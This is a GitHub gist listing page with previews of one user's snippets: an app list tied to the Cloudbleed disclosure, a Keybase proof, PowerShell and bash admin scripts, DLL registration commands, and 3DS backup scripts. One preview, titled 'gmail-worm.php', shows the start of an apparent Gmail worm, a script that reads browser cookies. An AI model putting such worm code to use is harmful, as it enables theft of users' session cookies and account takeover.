Skip to content

Instantly share code, notes, and snippets.

@veritas06
veritas06 / ios_apps.csv
Created February 24, 2017 21:46 — forked from dweinstein/ios_apps.csv
Sample of popular apps observed (via dynamic analysis) to possibly use Cloudflare https://www.nowsecure.com/blog/2017/02/23/cloudflare-cloudbleed-bugs-impact-mobile-apps
application_id package_name title version_string domain
282935706 tv.lifechurch.bible Bible 7.2 cloudflare.com
284910350 com.yelp.yelpiphone Yelp 11.4.0 cloudflare.com
290853822 net.box.BoxNet Box for iPhone and iPad 4.0.1 cloudflare.com
300255638 com.abcnews.ABCNews ABC News – Watch Breaking US & World News, Live Video & Election Coverage 5.10.0 cloudflare.com
304154888 com.nicusa.FBIMostWanted Most Wanted 2.3 cloudflare.com
319881193 com.grindrguy.grindrx Grindr - Gay, bi, social networking and dating app to chat and meet guys 3.0.13 cloudflare.com
322439990 com.fboweb.MyRadar MyRadar NOAA Weather Radar – Forecasts, Storms, and Earthquakes 4.4.4 cloudflare.com
327630330 com.getdropbox.Dropbox Dropbox 28.2 cloudflare.com
329913454 com.crunchyroll.iphone Crunchyroll - Everything Anime 3.00.2 cloudflare.com
@veritas06
veritas06 / keybase.md
Last active October 31, 2017 21:35
[KeyBase Proof] Proof of my accounts through KeyBase #auth #KeyBase

Keybase proof

I hereby claim:

  • I am veritas06 on github.
  • I am v3ritas (https://keybase.io/v3ritas) on keybase.
  • I have a public key ASCp85LE63pVowhqNMlh7pWs7H-mgbBhPA80uSJsqcGTRwo

To claim this, I am signing this object:

@veritas06
veritas06 / gmail-worm.php
Last active October 31, 2017 21:33 — forked from bevacqua/gmail-worm.php
[Gmail Worm] The worm that was gonig through Gmail accounts #PHP #Gmail #Google #worm
g.php:
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
@veritas06
veritas06 / Office365Login.ps1
Created September 29, 2017 22:48
[Office 365 Login] #PowerShell
$UserCredential = Get-Credential
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $UserCredential -Authentication Basic -AllowRedirection
Import-PSSession $Session
@veritas06
veritas06 / SimpleCopyScript.sh
Created November 12, 2017 19:03
[Simple Copy Script] Putting this here just for notes really #bash
# Source: Ryan's Tutorials: Bash Scripting Tutorial - 2. Variables of 8
# URL: https://ryanstutorials.net/bash-scripting-tutorial/bash-variables.php
#!/bin/bash
# A simple copy script
cp $1 $2
# Let's verify the copy worked
@veritas06
veritas06 / log_ssh.sh
Last active November 12, 2017 20:25
[Log SSH Session] Begins an SSH session with logging, at \home\<CurrentUser>\Logs\SSH.log #bash #ssh
#!/bin/bash
# Script to log each SSH session
# Create Log Directory
# CurrentUser="whoami" # Not needed
# mkdir "/home/$USER/Logs"
# mkdir "/home/$CurrentUser/Logs/"
# $LogDirectory="/home/$USER/Logs/"
# if [ ! -d "$LogDirectory" ]; then
@veritas06
veritas06 / Log_SSH_ADV.sh
Last active November 12, 2017 21:00
[Log SSH Session (Advanced)] Trying to add some items to the script, so making a new entry #bash
#!/bin/bash
# ------------------------------------------------------------------
# Sean P. McAdam: SSH Session Logging
# Script to log each SSH session
# ------------------------------------------------------------------
VERSION=0.2.0
SUBJECT=tech.v3ritas.log_ssh_adv
USAGE="Usage: log_ssh_adv -ivhc username destinationHost"
@veritas06
veritas06 / CMD-Reg&UnregDLLs.cmd
Created November 27, 2017 17:06
[CMD: Register & Unregister DLL's] This is how to use the .NET RegAsm tool to REGISTER & UNREGISTER DLL's. #CMD #dotNET #DLL
# The below commands are used for registering & unregistering DLL's with the .NET RegAsm tool:
#To Register:
SET WorkFolder= '<directory>'
regasm.exe %WorkFolder%\xxx.dll /Codebase
#To Unregister:
SET WorkFolder= '<directory>'
regasm.exe /unregister %WorkFolder%\xxx.dll
@veritas06
veritas06 / PS-Script_Template.ps1
Created November 27, 2017 21:18
[PS: Script Template] Just a template to follow for PowerShell scripts. #PowerShell #Template
# Source: GitHub: 9to5IT/Script_Template.ps1
# https://gist.github.com/9to5IT/9620683
#requires -version 2
<#
.SYNOPSIS
<Overview of script>
.DESCRIPTION
<Brief description of script>
@veritas06
veritas06 / Backup EmuNAND.gm9
Last active December 2, 2017 19:09
[3DS Custom Firmware Scripts] A copy of the GM9 scripts used in DS CFW #Nintendo #Homebrew #3DS #2DS
# EmuNAND backup GM9 script
# This will create a backup named [DATESTAMP]_[SERIAL]_emunand_???.bin
# author: d0k3
set ERRORMSG "EmuNAND backup failed"
set SUCCESSMSG "EmuNAND backup success"
ask "Create a EmuNAND backup in $[GM9OUT]?"
findnot $[GM9OUT]/$[DATESTAMP]_$[SERIAL]_emunand_???.bin OUTPATH
cp -h E:/nand_minsize.bin $[OUTPATH]